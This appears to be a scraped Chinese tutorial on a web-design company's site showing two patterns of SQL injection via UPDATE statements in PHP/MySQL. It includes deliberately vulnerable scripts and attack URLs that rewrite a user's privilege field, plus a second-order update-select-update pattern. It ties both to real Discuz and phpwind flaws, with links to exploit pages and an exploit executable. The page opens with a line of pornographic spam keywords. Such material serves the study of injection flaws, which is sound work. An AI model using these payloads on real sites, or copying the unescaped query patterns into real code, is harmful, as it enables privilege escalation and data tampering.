真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

UPDATE注射的兩個(gè)模式是什么

今天就跟大家聊聊有關(guān)UPDATE注射的兩個(gè)模式是什么,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

公司主營業(yè)務(wù):成都做網(wǎng)站、網(wǎng)站設(shè)計(jì)、移動網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競爭能力。成都創(chuàng)新互聯(lián)公司是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化,感謝他們對我們的高要求,感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn),讓我們激情的團(tuán)隊(duì)有機(jī)會用頭腦與智慧不斷的給客戶帶來驚喜。成都創(chuàng)新互聯(lián)公司推出如皋免費(fèi)做網(wǎng)站回饋大家。

一.測試環(huán)境:

OS: Windowsxp sp2

php: php 4.3.10 (

MySQL 4.1.9

apache 1.3.33 

二.測試數(shù)據(jù)庫結(jié)構(gòu):

----start---

-- 數(shù)據(jù)庫: `test`

-- 

-- --------------------------------------------------------

-- 

-- 表的結(jié)構(gòu) `userinfo`

-- 

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default ’1’,

`user` varchar(12) NOT NULL default ’heige’,

`pass` varchar(122) NOT NULL default ’123456’

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

-- 

-- 導(dǎo)出表中的數(shù)據(jù) `userinfo`

-- 

INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

------end-------

三.測試模式:

1,變量沒有帶’’或""[MOD1]

//test1.php Mod1

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");

$sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

腳本里只是修改user=’heige’的pass,如果groudid表示用戶的權(quán)限等級,我們的目的就是通過構(gòu)造$p 來達(dá)

到修改groupid的目的:

那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1

在mysql里查詢: mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass  |

+---------+-------+--------+

| 1    | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用戶heige的groudid又2改為1了 :)

所以我們可以得到?jīng)]有’’或"" update的注射是可以成功的,這個(gè)就是我們的模式1。

2,變量帶’’或""[MOD2]

?php

//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";

?>

為了關(guān)閉’我們構(gòu)造$p應(yīng)該為123456’,groudid=’2 提交:

http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了’

提交的語句變成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

mysql查詢:

mysql> select * from userinfo;

+---------+-------+--------------------+

| groudid | user | pass        |

+---------+-------+--------------------+

| 2    | heige | 123456’,groudid=’1 |

+---------+-------+--------------------+

1 row in set (0.00 sec)

groudid并沒有被修改。那么在變量被’’或""時(shí) 就完全沒有被注射呢?不是 下面我們看模式2:

//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result);  //$p的數(shù)據(jù)寫入數(shù)據(jù)庫

$sql= "select pass from userinfo where user=’heige’"; 

$result = mysql_db_query($dbname, $sql);

$userinfo=mysql_fetch_array($result); 

echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]

$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result); //把$userinfo[0] 再次update

?>

我們測試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1

回mysql查詢下 : mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user | pass  |

+---------+-------+--------+

| 1    | heige | 123456 |

+---------+-------+--------+

1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid為1。 這個(gè)就是我們的模式2了,簡單的描敘如下:

update-->select-->update

四.實(shí)際模式

模式1:Discuz 2.0/2.2 register.php 注射 

漏洞分析:http://4ngel.net/article/41.htm

Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

模式2:phpwind 2.0.2和3.31e 權(quán)限提升漏洞 

 漏洞分析:

update (profile.php 注射變量為$proicon update語句里為,icon=’$userdb[icon]’)

|

v

select (jop.php)

|

v

updtate (jop.php)

Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

看完上述內(nèi)容,你們對UPDATE注射的兩個(gè)模式是什么有進(jìn)一步的了解嗎?如果還想了解更多知識或者相關(guān)內(nèi)容,請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝大家的支持。


分享文章:UPDATE注射的兩個(gè)模式是什么
瀏覽地址:http://weahome.cn/article/gdgssd.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部